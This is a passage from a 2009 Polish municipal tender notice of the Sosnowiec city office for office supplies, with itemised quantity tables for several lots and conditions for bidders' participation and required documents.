34.	Pojemnik na spinacze plastikowy z magnesem	sztuka	9	9		
35.	Przekładki do segregatorów kartonowe, A4 w 1 opakowaniu mieści się 100 sztuk	opakowanie	10	10		
36.	Przekładki PP kolorowe z wymiennymi indeksami A4-10 	sztuka	30	30		
37.	Przekładki PP kolorowe z wymiennymi indeksami A4-5	sztuka	20	20		
38.	Przybornik plastikowy na biurko	sztuka	9	9		
39.	Rysiki do ołówków automatycznych HB-0,5  opakowanie -12 sztuk	opakowanie	5	5		
40.	Segregatory A4 szerokie 75 mm z czteropierścieniowym mechanizmem	sztuka	30	30		
41.	Segregatory A4 wąskie z dwupierścieniowym mechanizmem	sztuka	40	40		
42.	Segregatory A4 szerokie 75mm z dwupierścieniowym mechanizmem	sztuka	60	60		
43.	Skoroszyt A4 miękki plastikowy do wpięcia do segregatora	sztuka	120	120		
44.	Spinacze małe powlekane 28mm, opakowanie 100 sztuk	opakowanie	18	18		
45.	Spinacze metalowe pokryte kolorowym plastikiem 100 sztuk w opakowaniu -28 mm wys.	opakowanie	60	60		
46.	Spinacze metalowe pokryte kolorowym plastikiem 50 sztuk w opakowaniu 50 mm wys.	opakowanie	60	60		
47.	Taśma klejąca dwustronna 50 mm x 10m	sztuka	2	2		
48.	Taśma klejąca cienka 19 mm x12m	sztuka	4	4		
49.	Taśma klejąca szeroka, bezbarwna 50 mm x10m	sztuka	2	2		
50.	Taśma klejąca szeroka, brązowa 50 mm x 10 m	sztuka	2	2		
51.	Teczki do podpisu harmonijkowe 10 przegródek, oprawa skóropodobna -A4	sztuka	5	5		
52.	Teczka-pudełko wys. min 1,5 cm zamykane gumką -A4	sztuka	20	20		
53.	Teczki wiązane białe tekturowe A4, 1 opakowanie zawiera 50 sztuk	opakowanie	3	3		
54.	Teczki wiązane białe A4, oczkowe do wpięcia do segregatorów	sztuka	150	150		


Załącznik nr 2C- szczegółowy formularz oferty - dla  zadania C  	                             Prezydent Miasta Sosnowca
do postępowania przetargowego nr WAG.3410-01-67-09                                                                       al. Zwycięstwa 20
Urząd Miejski w Sosnowcu                                                                                              41-200 Sosnowiec
      Lp.	

Nazwa artykułu	
Jednostka
 miary	
Zamawiana
liczba	1
Dostawa 
w ciągu 7 dni od podpisania umowy
	Kwota
jednostkowa
brutto
jednostki  miary	Wartość 
całej poz.
brutto
(zamawianej liczby)
						
	1	2	3	4	5	6
55.	Teczki lakierowane A4 z gumką	sztuka	50	50		
56.	Teczki plastikowe A4 do wpięcia do segregatorów	sztuka	150	150		
57.	Tusz do pieczątek - czarny -22 ml zwykły	sztuka	2	2		
58.	Tusz do pieczątek - czerwony-22 ml zwykły	sztuka	2	2		
59.	Tusz do pieczątek - niebieski -22 ml zwykły	sztuka	2	2		
60.	Wąsy skoroszytowe, (opakowanie - 150 szt.)	opakowanie	3	3		
61.	Wkłady czarne do długopisów Zenith 7 lub równoważne	sztuka	30	30		
62.	Wkłady niebieskie do długopisów Zenith 7 lub równoważne	sztuka	30	30		
63.	Zakładki indeksujące 45 x 12mm. 1 (opakowanie  50 szt.)	opakowanie	18	18		
64.	Zakreślacz kolorowy Donau - pomarańczowy, lub równoważny	sztuka	7	7		
65.	Zakreślacz kolorowy Donau - zielony , lub równoważny	sztuka	7	7		
66.	Zakreślacz kolorowy Donau - różowy , lub równoważny	sztuka	7	7		
67.	Zakreślacz kolorowy Donau - żółty,  lub równoważny	sztuka	7	7		
68.	Wymazywacz  do atramentu typu Schneider lub równoważny	sztuka	5	5		
69.	Zestaw cienkopisów  ( w opakowaniu 6 kolorów)	opakowanie	5	5		
70.	Zestaw ołówków technicznych  stopień twardości od 8 B do 2H
(w opakowaniu - 12 sztuk)	opakowanie	3	3		
71.	Zestaw markerów wodoodpornych 
(4 kolory w komplecie)	komplet	3	3		
72.	Zszywacz Eagle 837 na  12 kartek, lub równoważny	sztuka	9	9		
73.	Zszywki 24-6, (w opakowaniu  1000 szt.)	opakowanie	40	40		
74.	Zszywki 24-8, (w opakowaniu  1000 szt.)	opakowanie	30	30		
75.	Tablica korkowa w drewnianej ramce wraz z  kompletem pinezek
45 cm szer. x 60 cm wys.	zestaw	5	5		

		
Załącznik nr 2D- szczegółowy formularz oferty - dla  zadania D  	                             Prezydent Miasta Sosnowca
do postępowania przetargowego nr WAG.3410-01-67-09                                                                       al. Zwycięstwa 20
Urząd Miejski w Sosnowcu                                                                                              41-200 Sosnowiec

Lp.	Nazwa artykułu	Jednostka miary	Zamawiana liczba	
1
Dostawa
7 dni po podpisaniu umowy	2
Dostawa
30.07.09	3
Dostawa
19.10.09	Kwota 
jednostkowa
brutto
jednostki 
miary	Wartość 
całej 
poz. 
brutto (zamawianej liczby)
								
	1	2	3	4	5	6	7	8
1.	Koperty białe 
z nadrukiem, samoklejące C-6	opakowanie
-(1000 szt.)	60	20	20	20		
2.	Koperty średnie,
szare, z klejem B-5	opakowanie
(500szt)	20	10	10	------		
3.	Koperty średnie, białe z klejem B-5	opakowanie
(500szt)	20	10	10			
4.	Koperty białe z klejem C-4	opakowanie
(500szt)	15	10	5	-------		
5.	Koperty białe bez nadruku, samoprzylepne C-6	opakowanie
(1000 szt.)	60	20	20	20		
6.	Koperty rozszerzane
390mm x 255mm, białe	sztuki	600
	200	200	200		
7.	Koperty powietrzne B-16
(A-4)	sztuki	100
	50	50	--------		
8.	Koperty powietrzne B-12 	sztuki	50
	25	25	--------		
9.	Koperty szare z klejem
 C-4 	opakowanie
(500szt.)6	6	---------	---------		
10.	Koperty białe DL bez okienka	opakowanie
(1000 szt.)	6	6	--------	---------		

UWAGA: Nie dopuszcza się kopert wykonanych z papieru makulaturowego

Załącznik nr 2E- szczegółowy formularz oferty - dla  zadania E		                 Prezydent Miasta Sosnowca
do postępowania przetargowego nr WAG.3410-01-67-09                                                                       al. Zwycięstwa 20
Urząd Miejski w Sosnowcu                                                                                              41-200 Sosnowiec

Lp.	Nazwa artykułu	Jednostka
 miary	Zamawiana
 liczba	1
Dostawa
25.11.09	Kwota
 jednostkowa
brutto
Jednostki
miary	Wartość
 całej 
poz.
 brutto
(zamawianej 
liczby)
						
	1	2	3	4	5	6
1.	Papier ksero
A-4; 80g-m2- stopień białości CIE 161	ryza
500 sztuk	910			
2.	Papier ksero 
A-3, 80g-m2-stopień białości CIE 161	ryza
500 sztuk	50.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 30.19.20.00-1, 30.19.76.44-2, 30.19.92.30-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 25.11.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> zestawienie warunków udziału w postępowaniu

Wykonawca, który zamierza ubiegać się o zamówienie winien:
1. Posiadać uprawnienia do wykonywania działalności będącej przedmiotem zamówienia.
2.Posiadać niezbędną wiedzę i doświadczenie oraz dysponować potencjałem technicznym i osobami zdolnymi do wykonania zamówienia w zakresie obejmującym zadanie lub przedstawić pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia.
3.Znajdować się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia. 
4.Nie podlegać wykluczeniu z postępowania o udzielenie zamówienia.

Ocena spełniania warunków wymaganych od Wykonawców dokonywana będzie według formuły: -spełnia - nie spełnia - określonej w druku ZP-17 zgodnie z Rozporządzeniem Prezesa Rady Ministrów z dnia 16 października 2008 r. w sprawie protokołu postępowania o udzielenie zamówienia publicznego (Dz. U. Nr 188, poz. 1154 z 2008 r.)..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> wykaz dokumentów wymaganych od Wykonawców w celu potwierdzenia spełnienia warunków udziału

1.W celu potwierdzenia posiadania uprawnień do wykonywania działalności w zakresie dostawy obejmującej przedmiot zamówienia, przedłożenia odpisu z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej ( wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert).
2.W celu potwierdzenia spełnienia warunku posiadania niezbędnej wiedzy i doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonania zamówienia w zakresie objętym postępowaniem należy przedłożyć :
- wykaz co najmniej dwóch dostaw obejmujących dostawę artykułów biurowych, z podaniem ich wartości, dat wykonania i odbiorców
- dokumenty potwierdzające, że dostawy te w okresie ostatnich trzech lat (licząc wstecz od terminu składania ofert, a jeżeli okres prowadzenia działalności był krótszy to tylko z tego okresu) zostały wykonane należycie (np.: listy referencyjne lub inne).
3.W celu potwierdzenia spełnienia warunku znajdowania się w sytuacji ekonomicznej
 i finansowej zapewniającej wykonanie zamówienia należy załączyć oświadczenie 
w trybie art. 22 ust 1 pkt 1, 2, 3 ustawy Prawo zamówień publicznych (załącznik nr 3 do SIWZ) złożone pod rygorem odpowiedzialności karnej za fałszywe zeznania zgodnie z art. 233 §1 Kodeksu karnego.
4. W celu spełnienia warunku nie podlegania wykluczeniu z postępowania o udzielenie zamówienia należy załączyć:
a)aktualne zaświadczenie właściwego Oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczenie,że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonanie decyzji właściwego organu, wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,
b)aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające,że Wykonawca nie zalega z opłacaniem podatków, opłat lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonanie decyzji właściwego organu podatkowego, wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,
c)aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust.1 pkt. 4-8 ustawy Prawo zamówień publicznych (tekst jednolity Dz. U. Nr 223 poz. 1655 z 2007 r. z późniejszymi zmianami), wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert i aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy Prawo zamówień publicznych (tekst jednolity Dz. U. Nr 223 poz. 1655 z 2007 r. z późniejszymi zmianami) - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.um.sosnowiec.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wydział Administracyjno-Gospodarczy, al.Zwycięstwa 20, 41-200 Sosnowiec.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.06.2009 godzina 10:00, miejsce: Urząd Miejski w Sosnowcu, Wydział Administracyjno-Gospodarczy, al. Zwycięstwa 20, 41-200 Sosnowiec, pokój 502 D.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa artykułów biurowych na potrzeby komórek organizacyjnych Urzędu Miejskiego w Sosnowcu - zadanie A.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Załącznik nr 2A- szczegółowy formularz oferty - dla  zadania A		                             Prezydent Miasta Sosnowca
do postępowania przetargowego nr WAG.3410-01-67-09                                                                       al. Zwycięstwa 20
Urząd Miejski w Sosnowcu                                                                                              41-200 Sosnowiec

      Lp.	

Nazwa artykułu	
Jednostka
 miary	
Zamawiana
liczba	1
Dostawa
5 dni po podpisaniu umowy	2
Dostawa
06.07.09	3
Dostawa
09.11.09	Kwota
jednostkowa
brutto
jednostki  miary	Wartość 
całej poz.
brutto
(zamawianej liczby)
								
	1	2	3	4	5	6	7	8
1.	Blok szkolny formatu A-4
 w kratkę, 50 kartkowy nie makulaturowy	 
sztuki	
300	
----------	
150	
150		
2.	Zeszyt w kratkę format A-4, twarda oprawa 96 kartkowy	sztuki	
150	
----------	
70	
80		
3.	Zeszyt w kratkę format
A-5, 96 kartkowy, twarda oprawa	
sztuki	
150	
----------	70	80		
4.	Teczka do podpisu A-4
harmonijkowa (10 przegródek) skóropodobna	
sztuki	
200	
100	50	50		
5.	Teczka do podpisu  ze skorowidzem alfabetycznym od A do Z	sztuki	5	---------	5	--------		
6.	Skorowidz alfabetyczny A-5
twarda oprawa ( 100 kartek)	sztuki	30	15	--------	15		
7.	Skoroszyt kartonowy oczkowy do wpinania do segregatora cały (1:1)	sztuki	5000	2000	2000	1000		
8.	Segregator   7,5 cm A4 (PCV)
z wymienną etykietą	sztuki	1800	800	500	500		
9.	Segregator szer. grzbietu  5, cm A4  (PCV) z wymienną  etykietą	sztuki	500	150	200	150		
10.	Teczki wiązane tekturowe (białe)	sztuki	25 000	10 000	15 000	-----		
11.	Pudła archiwizacyjne 100mm
tekturowe	sztuki	2700	1000	700	1000		
12.	Teczka z gumką (biała) 	sztuki	1000	400	200	400		
13.	Teczka na rzepy A-4	sztuki	10	---------	10	---------		
14.	Gumka typu PILOT -średnia 
lub równoważna	sztuki	100	----------	100	--------		
15.	Dratwa 10 dkg	sztuki	10	----------	10			
16.	Taśma dwustronna 24 mm x 5 m	sztuki	10	10	--------	--------		
17.	Taśma dwustronna 50 mm x 25m	sztuki	5	5	---------	---------		
18.	Temperówka metalowa	sztuki	100	---------	50	50		
19.	Tusz do stempli (fiolet)  22ml, zwykły	sztuki	20	---------	20	---------		
20.	Tusz do stempli (czarny) 22 ml, zwykły	sztuki	100	50	--------	50		
21.	Tusz do stempli (czerwony) 
22 ml, zwykły	sztuki	40	--------	40	--------		
22.	Dziurkacz  Eagle 837 na 
 15 kartek - lub równoważny	 sztuki	50	25	--------	25		
23.	Dziurkacz  Eagle AXA P6122B na 40 kartek- lub równoważny	    sztuki	30	-----------	15	15		
24.	Zszywacz Eagle AXA S 6120B na 12 kartek - lub równoważny 	    sztuki	100	50	-------	50		

Załącznik nr 2A- szczegółowy formularz oferty - dla  zadania A		                             Prezydent Miasta Sosnowca
do postępowania przetargowego nr WAG.3410-01-67-09                                                                       al. Zwycięstwa 20
Urząd Miejski w Sosnowcu                                                                                              41-200 Sosnowiec
Lp.	Nazwa artykułu	Jednostka
miary	Zamawiana liczba	
1
Dostawa
5 dni po podpisaniu umowy	2
  Dostawa
   06.07.09	3
Dostawa
09.11.09	Kwota
jednostkowa
brutto
jednostki
miary	Wartość 
całej          
poz. brutto
(zamawianej liczby)
								
	1	2	3	4	5	6	7	8
25.	Zszywacz Laco H 401
30 kartek, lub równoważny, dopuszczalny plastikowy długość powyżej 100 mm, -  lub równoważny	sztuki	
15	
10	
5	
----------		
26.	Rozszywacz 	sztuki	50	----------	25	25		
27.	Zszywki 24-6 
1000 sztuk w opakowaniu	pudełeczko	1000	300	400	300		
28.	Długopis  ZENITH nr 7 - lub równoważny	sztuki	550	550	---------	---------		
29.	Długopis Unix (niebieski )
- lub równoważny	sztuki	1000	400	300	300		
30.	Długopis Corvina 51(niebieski) - lub równoważny	
sztuki	
100	
100	
----------	
----------		
31.	Długopis ZENITH 1
- lub równoważny	sztuki	250	150	100	----------		
32.	Wkład do ZENITHU nr 7
- lub równoważny	sztuki	1100	500	300	300		
33.	Wkład do ZENITHU nr 1
- lub równoważny	sztuki	500	200	100	200		
34.	Wkład do Unixu (niebieski)
- lub równoważny	sztuki	500	---------	200	300		
35.	Cienkopis Stabilo (czarny)
- lub równoważny	sztuki	800	300	250	250		
36.	Cienkopis Stabilo (czerwony)
- lub równoważny	sztuki	600	200	200	200		
37.	Cienkopis Stabilo (zielony)
- lub równoważny	sztuki	300	100	100	100		
38.	Zakreślacz (żółty) DONAU
- lub równoważny	sztuki	250	100	100	50		
39.	Zakreślacz (zielony) DONAU- lub równoważny	sztuki	200	100	-----	100		
40.	Zakreślacz (pomarańczowy)
DONAU- lub równoważny	
sztuki	200	100	50	50		
41.	Zakreślacz  (różowy)
DONAU - lub równoważny	sztuki	200	100	50	50		
42.	Pisak w komplecie STAEDTLER 
( zielony, czerwony, niebieski, czarny) lub równoważny	komplet	30	---------	15	15		
43.	Długopis przylepny na sprężynce, BIFA lub równoważny	
sztuki	
80	
40	
40	
--------		
Załącznik nr 2A- szczegółowy formularz oferty - dla  zadania A		                             Prezydent Miasta Sosnowca
do postępowania przetargowego nr WAG.3410-01-67-09                                                                       al. Zwycięstwa 20
Urząd Miejski w Sosnowcu                                                                                              41-200 Sosnowiec
Lp.	Nazwa artykułu	Jednostka miary	Zamawiana
liczba	
1
Dostawa
5 dni po podpisaniu umowy	2
Dostawa
06.07.09	3
Dostawa
09.11.09	Kwota
jednostkowa
brutto
jednostki
miary	Wartość 
całej poz.
 brutto
(zamawianej liczby)
								
	1	2	3	4	5	6	7	8
44.	Poduszki samotuszujące.
11cm x7 cm fioletowe,	sztuki	40	--------	20	20		
45.	Poduszki samotuszujące.
11cm x7 cm czarne	sztuki	40	20	20	---------		
46.	Zszywki 24-8
(1000 sztuk - opakowanie)	pudełeczko	70	50	20	----------		
47.	Nożyczki metalowe dł 17 cm z plastikowym uchwytem  	sztuki	70	70	----------	----------		
48.	Marker czarny, gruby, wodoodporny, okrągła końcówka, firmy Stabilo - lub równoważny	sztuki	300	
200	
100	
----------		
49.	Marker czarny, gruby, wodoodporny, ścięta końcówka, firmy Stabilo lub równoważny	sztuki	50	30	20	----------		
50.	Ołówek automat PENTEL Fiesta AX 125- 0,5mm lub równoważny	sztuki	30	10	20	-----------		
51.	Grafity do ołówków ( 0,5) HB
(12 rysików opakowanie)	opakowanie	
40	20	20	----------		
52.	Korektor w płynie  z gąbką - opakowanie 20 ml	sztuki	50	10	20	20		
53.	Korektor w piórze  8 ml szybkoschnący z metalową końcówką, uchwyt połączony z dozownikiem	sztuki	50	
20	
10	
20		
54.	Korektor w taśmie  4,2 mm x 9m 	sztuki	100	100	------	------		
55.	Klej biurowy w sztyfcie 15 g DONAU lub równoważny	sztuki	2000	500	500	1000		
56.	Notes żółty samoprzylepny
7,5 x 7,5 -100 kartek w bloczku-	bloczek	1000	400	300	300
	
57.	Notes żółty samoprzylepny
7,5 x 5,0 -100 kartek w bloczku	bloczek	700	300	200	200

58.	Kostka biurowa biała
8,5 x 8,5 (500 kartek bloczku)	bloczek	400	150	100	150		
59.	Ofertówka twarda A-4 -L
bezbarwna	sztuki	2500	800	800	900		
60.	Taśma klejąca przezroczysta 2,4 cm szeroka dł. 20m	sztuki	200	----------	100	100		
61.	Skoroszyt plastikowy A4 zawieszkowy	sztuki	500	200	150	150		
62.	Identyfikator, plastikowy, przezroczysty  9cm x 5,5 cm	sztuki	600	200	200	200		
63.	Taśma klejąca przezroczysta 4,8cm szerokości x 50m dł. 	sztuki	80	40	20	20		
Załącznik nr 2A- szczegółowy formularz oferty - dla  zadania A		                             Prezydent Miasta Sosnowca
do postępowania przetargowego nr WAG.3410-01-67-09                                                                       al. Zwycięstwa 20
Urząd Miejski w Sosnowcu                                                                                              41-200 Sosnowiec

Lp.	Nazwa artykułu	Jednostka miary	Zamawiana liczba	
1
Dostawa
5 dni po podpisaniu umowy	2
Dostawa
06.07.09	3
Dostawa
09.11.09	Kwota 
jednostkowa
brutto
jednostki 
miary	Wartość 
całej 
poz. 
brutto (zamawianej liczby)
								
	1	2	3	4	5	6	7	8
64.	Koszulki do segregatora A-4, 100 sztuk w opakowaniu, 
(z grubszej foli )	opakowanie	200	
100	
50	
50		
 65.	Skoroszyt plastikowy A4	sztuki	500	200	200	100		
66.	Teczka A4 z klipsem z dwiema sztywnymi okładkami 
i mechanizmem zaciskowym do papieru	sztuki	40	

20	

20	

----------		
67.	Przekładka do segregatora z kartonu, indeksy kolorowe (10) numerowana A4	opakowanie	50	

----------	
25	
25		
68.	Okładki do bindownicy przód (folia bezbarwna) (100 sztuk w opakowaniu) format A4	opakowanie	10	

----------	

10	

---------		
69.	Okładki do bindownicy tył (karton skóropodobny) 
(100 sztuk w opakowaniu) A4 kolor	opakowanie	10	

----------	

10	

-----------		
70.	Grzbiety do bindownicy 12 format A4 100 sztuk w opakowaniu	opakowanie	5	

2	

3	

-----------		
71.	Grzbiety do bindownicy 16 format A4 100 sztuk w opakowaniu	opakowanie	4	
2	
2	
-----------		
72.	Grzbiety do bindownicy 20 format A4 100 sztuk w opakowaniu	opakowanie	2	
2	---------	-----------		
73.	Spinacze metalowe pokryte kolorowym plastikiem 100 sztuk w opakowaniu 28 mm -wys.	opakowanie	800	300	200	300		
74.	Spinacze metalowe pokryte kolorowym plastikiem 50 sztuk w opakowaniu 50 mm- wys.	opakowanie	400	150	150	100		
75.	Blok do tablicy FLIBCHART  70cm x100 cm	sztuki	3	--------	3	---------		
76.	Teczki skóropodobne do podpisu z numeratorem po boku A4  (1-31)	sztuki	10	5	--------	5		

Załącznik nr 2A- szczegółowy formularz oferty - dla  zadania A		                             Prezydent Miasta Sosnowca
do postępowania przetargowego nr WAG.3410-01-67-09                                                                       al. Zwycięstwa 20
Urząd Miejski w Sosnowcu                                                                                              41-200 Sosnowiec

Lp.	Nazwa artykułu	Jednostka miary	Zamawiana liczba	
1
Dostawa
5 dni po podpisaniu umowy	2
Dostawa
06.07.09	3
Dostawa
09.11.09	Kwota jednostkowa
brutto
jednostki
miary	  Wartość 
całej 
poz.
 brutto (zamawianej liczby)
								
	1	2	3	4	5	6	7	8
77.	Akcesoria do tablic suchościeralnych: komplet 4 markerów, gąbka do czyszczenia z płynem, komplet magnesów 	zestaw	5	3	2	-------		
78.	Tablica korkowa
90 cm szer. x 60cm wys. w drewnianej ramce wraz z kompletem pinezek	zestaw	2	----------	2	--------		
79.	Tablica korkowa w drewnianej ramce
80 cm szer. x 50 cm wys 
wraz z kompletem pinezek	zestaw	2	----------	2	--------		
80.	Tablica korkowa w drewnianej ramce wraz z  kompletem pinezek
100 cm szer. x 60cm wys.	zestaw	2	----------	2	--------		
81.	Linijka przezroczysta plastikowa dł. 30 cm	sztuki	40	20	--------	20		
82.	Koszulki groszkowe formatu A5 opakowanie 100 sztuk	opakowanie	5	2	3	-----------		
83.	Koszulki z klapką  z boku, (opakowanie 25 sztuk )	opakowanie	10	4	4	2		
84.	Plastikowe szufladki na biurko A4	sztuki	100	50	50	---------		
85.	Blok techniczny -10 kartkowy A4	sztuki	60	60	---------	---------		
86.	Spinacze krzyżakowe duże 70 mm (opakowanie 12 sztuk)	opakowanie 	10	10	---------	---------.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.20.00-1, 30.19.76.44-2, 30.19.92.30-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 25.11.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa artykułów biurowych  na potrzeby Powiatowej Komisji Lekarskiej - zadanie B.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Załącznik nr 2B- szczegółowy formularz oferty - dla  zadania B  	                             Prezydent Miasta Sosnowca
do postępowania przetargowego nr WAG.3410-01-67-09                                                                       al. Zwycięstwa 20
Urząd Miejski w Sosnowcu                                                                                              41-200 Sosnowiec
           

Lp.	

Nazwa artykułu	
Jednostka
 miary	
Zamawiana
liczba	
Dostawa
25.09.09	Kwota
jednostkowa
brutto
jednostki 
 miary	Wartość
 całej
 poz.
brutto
(zamawianej liczby)
						
	1	2	3	4	5	6
1.	Cienkopis STABILO (czarny) 
lub równoważny	sztuki	40	40		
2.	Cienkopis STABILO (niebieski) 
lub równoważny	sztuki 	40	40		
3.	Cienkopis  STABILO (zielony) 
lub równoważny	sztuki	30	30		
4.	Cienkopis  STABILO (czerwony) lub równoważny	sztuki 	30	30		
5.	Pióro kulkowe UB-150 (czarny) 
lub równoważne	sztuki	70	70		
6.	Pióro kulkowe UB-150 (niebieskie) lub równoważne	sztuki 	70	70		
7.	Pióro kulkowe UB-150 (czerwone) lub równoważne	sztuki	12	12		
8.	Pióro kulkowe MonAmi VURiter (czarne) lub równoważne	sztuki 	60	60		
9.	Pióro kulkowe MonAmi VURiter (niebieskie) lub równoważne	sztuki	60	60		
10.	Długopis typ ZENITH 7 (wkłady niebieskie) lub równoważny	sztuki 	100	100		
11.	Wkłady do długopisów  ZENITH 7 lub równoważne	sztuki	100	100		
12.	Długopisy zwykłe UNIX  (wkłady niebieskie) lub równoważne	sztuki 	100	100		
13.	Pisak biurowy  STAEDTLER 326 (czarny) lub równoważny	sztuki	40	40		
14.	Ołówek automatyczny 0,5 mm	sztuki 	12	12		
15.	Grafit do ołówków automatycznych HB Pentel Polimer lub równoważny (opakowanie 12 sztuk)	opakowanie	12	12		
16.	Ołówek drewniany HB	sztuki 	60	60		
17.	Ołówek drewniany 2B	sztuki 	60	60		
18.	Gumka techniczna typ FACTIS sofler - średnia lub równoważna	sztuki	30	30		
19.	Klej w sztyfcie DONAU lub równoważny	sztuki 	40	40		
20.	Temperówka  metalowa	sztuki	20	20		
21.	Nożyczki 17 cm - całe z metalu	sztuki 	4	4		
22.	Zszywacz obrotowy EAGLE typ 9628 lub równoważny	sztuki	10	10		
23.	Zszywki 24-6 (1000 sztuk
 w opakowaniu)	opakowanie	30	30		
24.	Zszywki 24-8 (1000 sztuk
 w opakowaniu)	opakowanie	20	20		
25.	Zszywki 23-13  (1000 sztuk
 w opakowaniu)	opakowanie	10	10		
26.	Zszywki 23-17 (1000 sztuk
 w opakowaniu)	opakowanie	10	10		
Załącznik nr 2B- szczegółowy formularz oferty - dla  zadania B  	                             Prezydent Miasta Sosnowca
do postępowania przetargowego nr WAG.3410-01-67-09                                                                       al. Zwycięstwa 20
Urząd Miejski w Sosnowcu                                                                                              41-200 Sosnowiec



Lp.	

Nazwa artykułu	
Jednostka
 miary	
Zamawiana
liczba	
Dostawa
25.09.09	Kwota
jednostkowa
brutto
jednostki  
miary	Wartość 
całej
 poz.
brutto
(zamawianej liczby)
						
	1	2	3	4	5	6
27.	Dziurkacz Eagle AXA P6122B-40 kartek lub równoważny	sztuka	5	5		
28.	Linijka przezroczysta, plastikowa  20 cm	sztuka	12	12		
29.	Linijka przezroczysta, plastikowa  30 cm	sztuki	12	12		
30.	Linijka przezroczysta, plastikowa  50 cm	sztuka	5	5		
31.	Korektor w taśmie  4,2 mm x 9 mm	sztuka	5	5		
32.	Przybornik  na biurko plastikowy, przezroczysty	sztuka	8	8		
33.	Notes samoprzylepny  51 mm x 76 mm (żółty)	bloczek	60	60		
34.	Notes samoprzylepny  38mm x 51mm (żółty)	bloczek	60	60		
35.	Notes samoprzylepny  76mm x 76 mm (żółty) 	bloczek	60	60		
36.	Notes samoprzylepny  75 mm x 127 mm (żółty)	bloczek	60	60		
37.	Folia samoprzylepna przezroczysta  A0 	sztuka	10	10		
38.	Brystol (biały) 70x100   B1	sztuka	10	10		
39.	Brystol (zielony) 70x100   B1	sztuka	10	10		
40.	Brystol (czerwony) 70x100   B1	sztuka	10	10		
41.	Brystol (niebieski)  70x100  B1	sztuka	10	10		
42.	Taśma samoprzylepna 19mm x 33 m	sztuka	6	6		
43.	Taśma samoprzylepna  (dwustronna)
30 mm x 5 m	sztuka	6	6		
44.	Zakładki index -typu Post-it lub równoważne	opakowanie	12	12		
45.	Skoroszyt plastikowy oczkowy  A4 (czerwony) (w op.10 szt.)	opakowanie	100	100		
46.	Skoroszyt plastikowy oczkowy  A4 (czarny) (w op.10 szt.)	opakowanie	50	50		
47.	Skoroszyt plastikowy oczkowy A4 (zielony) (w op.10 szt.)	opakowanie	50	50		
48.	Koperty C6 SK  (samoklejące)  bez nadruku - białe niemakulaturowe (w op.1000 szt.)	opakowanie	4	4		
49.	Koperty C5 SK  (samoklejące) -  białe niemakulaturowe (w op.500 szt.)	opakowanie	2	2		
50.	Koperty C4 SK  (samoklejące) -  białe niemakulaturowe ( w op.250 szt.)	opakowanie	2	2		
51.	Koperty C4 SK  (samoklejące) - brązowe niemakulaturowe
 (w op.250 szt.)	opakowanie	1	1		


